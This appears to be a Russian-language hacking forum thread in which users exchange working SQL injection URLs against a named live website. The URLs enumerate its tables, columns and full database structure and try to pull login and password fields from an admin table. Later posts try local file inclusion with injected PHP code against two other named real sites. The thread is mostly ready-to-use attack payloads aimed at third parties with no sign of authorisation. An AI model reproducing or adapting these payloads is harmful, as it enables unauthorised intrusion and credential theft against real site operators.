http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+51,1+--+ Как вывести все поля из этой таблицы? В title ответ
Code: http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x52726567696f6e7341646d696e73--+a Где 0x52726567696f6e7341646d696e73 == RregionsAdmins в HEX.
Code: http://www.svrwheels.ru /index.php?pageId=-2+union+select+1,Group_concat%28column_name%29,3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.columns+Where+table_name=0x52726567696f6e7341646d696e73+--+ Ereee опередил...
Спасибо! А как вывести структуру бд? как тут http://i.imgur.com/5e1qH.png UPD: Почему http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,pass,login,4,5,6,7,8,9,10+FROM+0x52726567696f6e7341646d696e73+--+ ничего не выводит, кроме ошибки? Что не так?
Структура: Code: http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,(select%20@pro%20from%20(%20select%20@pro:=0x2727,%20(select%20null%20from%20information_schema.tables%20where%20concat(table_schema,0x2e,table_name)%20not%20in(%20@pro:=concat(@pro,0x2c27,table_schema,0x2e,table_name,0x27))limit%200,1))f),3,4,5,6,7,8,9,10--+a По-твоему вопросу: 1. Нельзя после FROM имя таблицы в hex переводит. 2. Твоя таблица в другой базе: Code: http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,concat(table_name,0x3a,table_schema),3,4,5,6,7,8,9,10+FROM+information_schema.tables+limit+51,1--+a 3. Тебе нужно потренироватся на буржуйских сайтах. 4. Пустая таблица: Code: http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,count(*),3,4,5,6,7,8,9,10+FROM+u261330_catalog.RregionsAdmins+limit+0,1--+a В <title> написано, что записей "0".
дамы и господа прежде чем задавать какиелибо вопросы по SQL-иньекциям ознакомтись пожалуйсто со статьей http://forum.antichat.net/thread43966.html а потом только выесняйте непонятные моменты! ("а" обсолютно ничего не значит после комента, так как она закоментирована)
А я думал браузер удаляет пробел, если он в самом концу URL. Т.е. для браузера: -- =-- А если сделать -- a, то не будет удалять пробел. Я так думал.
Ты правильно думал, только не браузер его удаляет, а есть приличный шанс нарваться например на trim(). winstrool у тебя все посты такие чёткие, что лучше тебе не писать совсем, а то ещё с группы выгонят не дай бог
а почему например тут так не получается? http://www2.mati.ru/english/index.php?path=../../../../../../../../../../../proc/self/cmdline%00&%3C?php%20print%20php_uname%28%29;?%3E или тут http://bombaticket.ru/pg.php?p=../../../../../proc/self/cmdline%00&%3C?php%20print%20php_uname%28%29;?%3E
Про инклуд, есть миллион статей, в которых описываются какие именно нужно инклюдить файлы, зачем везде инклюдить /proc/self/cmdline в который ничего не попадает из вашего запроса к серверу?
А как такое возможно в phpMyAdmin есть 4 одинаковых пользователя но у двоих из них File_priv Y а у двоих N,как это вообще понимать?